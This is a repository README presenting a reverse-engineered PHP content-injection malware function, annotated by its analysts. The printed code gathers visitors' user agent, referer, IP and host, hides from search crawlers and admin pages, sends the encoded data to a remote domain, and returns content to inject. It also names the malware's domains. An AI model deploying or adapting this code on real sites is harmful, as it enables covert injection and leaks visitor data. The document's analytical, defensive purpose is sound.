This repository is a result of a Reverse Engineering of PHP Malware that makes Content injection.
The full description can be found in english in (@todo add link here) and in portuguese in (@todo add link here)
Authors of this work (re rev.eng., not the malware):
- Bernardo Donadio bcdonadio at bcdonadio.com
- Emerson Rocha Luiz emerson at alligo.com.br
/** REVENGNOTE: Do not assume that this malware will have same function names.
* even for the same malware.
*/
function day212()
{
$a = check212("HTTP_USER_AGENT");
$b = check212("HTTP_REFERER");
$c = check212("REMOTE_ADDR");
$d = check212("HTTP_HOST");
$e = check212("PHP_SELF");
/** REVENGNOTE: this next array does nothing here. But was on original code.
* 33db9538.com, 9507c4e8.com, e5b57288.com and 54dfa1cb.com
* are domains that point (now) for the same working server
* they are used to create content to inject on user code
*
*/
$domarr = array(
"33db9538",
"9507c4e8",
"e5b57288",
"54dfa1cb"
);
/** REVENGNOTE: this is very important. It does NOT inject content on site
* if is a search engine (that could alert site admin of this
* malware, and also does not load on pages that are like
* for administratior interfaces. It also check for a valid
* HTTP_REFERER, so sometimes, share a link with a friend will
* not work at all, because you need navitate on the site before
* Is very likely that most common antivirus agents will maybe
* pass this basic check, but remote server will know they
* user agent and will return empty content.
*/
if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e) , "admin") or (preg_match("/" . implode("|", array(
"google",
"slurp",
"msnbot",
"ia_archiver",
"yandex",
"rambler"
)) . "/i", strtolower($a)))) {
$o1 = "";
}
else {
$op = mt_rand(100000, 999999);
$g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
$url = "http://" . cqq(".com") . "/" . $g4;
$ca1 = en2(@gtd($url) , $op);
$a1 = @explode("!NF0", $ca1);
if (sizeof($a1) >= 2) $o1 = $a1[1];
else $o1 = "";
}
return $o1;
}This is a reverse-engineering of malicious code found in compromised servers. The use of this code without explicit consent of the owner of the infrastructure constitutes a felony in many countries. Do not use except for educational purposes.